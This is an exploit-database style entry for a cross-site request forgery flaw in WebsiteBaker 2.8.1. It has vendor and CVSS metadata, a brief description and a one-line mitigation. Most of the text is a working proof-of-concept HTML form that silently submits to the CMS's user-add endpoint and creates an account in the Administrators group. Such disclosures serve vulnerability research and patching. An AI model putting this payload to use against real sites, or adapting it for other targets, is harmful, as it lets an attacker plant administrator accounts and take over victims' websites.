WebsiteBaker 2.8.1 CSRF Proof of Concept By Luis Santana HackTalk Security

vendor:

WebsiteBaker

by:

Luis Santana

8,8

CVSS

HIGH

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: WebsiteBaker

Affected Version From: 2.8.1

Affected Version To: 2.8.1

Patch Exists: NO

Related CWE: N/A

CPE: a:websitebaker:websitebaker:2.8.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: All

2009

WebsiteBaker 2.8.1 CSRF Proof of Concept By Luis Santana HackTalk Security

A Cross-Site Request Forgery (CSRF) vulnerability exists in WebsiteBaker 2.8.1. An attacker can exploit this vulnerability to add a new administrator user to the application without requiring any authentication. The attacker can craft a malicious HTML page containing a form with the necessary parameters to add a new user and submit it to the vulnerable application. This will add a new administrator user to the application.

Mitigation:

The application should implement a CSRF protection mechanism to prevent attackers from exploiting this vulnerability.

Source

Exploit-DB raw data:

# Author: Luis Santana
# Software Link: http://www.websitebaker2.org/modules/download_gallery/dlc.php?file=88&id=1269641667
# Version: 2.8.1
# Tested on: All
# Code : http://hacktalk.net/exploits/websitebakercsrfPOC.zip

The full advisory can be found at
http://hacktalk.net/exploits/websitebakerCSRF.txt

Regards,
Luis Santana
Admin - http://hacktalk.net
HackTalk Security

<h1>WebsiteBaker 2.8.1 CSRF Proof of Concept By Luis Santana HackTalk Security</h1>
<form name="user"action="http://demo.opensourcecms.com/websitebaker/admin/users/add.php" method="post" class="">
<input type="hidden" name="user_id" value="" />
<input type="hidden" name="username_fieldname" value="username_08y7h65u" />

<table cellpadding="5" cellspacing="0" border="0" width="100%">
<tr>
<td width="150">Username:</td>
<td class="value_input">
<input type="text" name="username_08y7h65u" maxlength="30" value="" />
</td>
</tr>
<tr>
<td>Password:</td>

<td class="value_input">
<input type="password" name="password" maxlength="30" />
</td>
</tr>
<tr>
<td>Re-type Password:</td>
<td class="value_input">
<input type="password" name="password2" maxlength="30" />
</td>

</tr>
<tr style="display:none;">
<td> </td>
<td style="font-size: 10px;">
Please note: You should only enter values in the above fields if you wish to change this users password
</td>
</tr>
<tr>
<td>Display Name:</td>
<td class="value_input">
<input type="text" name="display_name" maxlength="255" value="" />

</td>
</tr>
<tr>
<td>Email:</td>
<td class="value_input">
<input type="text" name="email" maxlength="255" value="" />
</td>
</tr>
<tr style="">
<td>Home Folder:</td>

<td class="value_input">
<select name="home_folder">
<option value="">None</option>

<option value="/testbild" >/media/testbild</option>
</select>
</td>
</tr>
<tr>

<td>Group:</td>
<td class="value_input">
<select name="groups[]" multiple="multiple" size="5">

<option value="1" >Administrators</option>
</select>
</td>
</tr>
<tr>

<td> </td>
<td>
<input type="radio" name="active[]" id="active" value="1" checked="checked" />
<label for="active">Active</label>
<input type="radio" name="active[]" id="disabled" value="0" />
<label for="disabled">Disabled</label>
</td>
</tr>

<tr>
<td> </td>
<td>
<input type="submit" name="submit" value="Add" />
<input type="reset" name="reset" value="Reset" />
</td>
</tr>
</table>

</form>


<p>Greetz to Shardy, Xires and Stacy, Rage, and n3xus</p>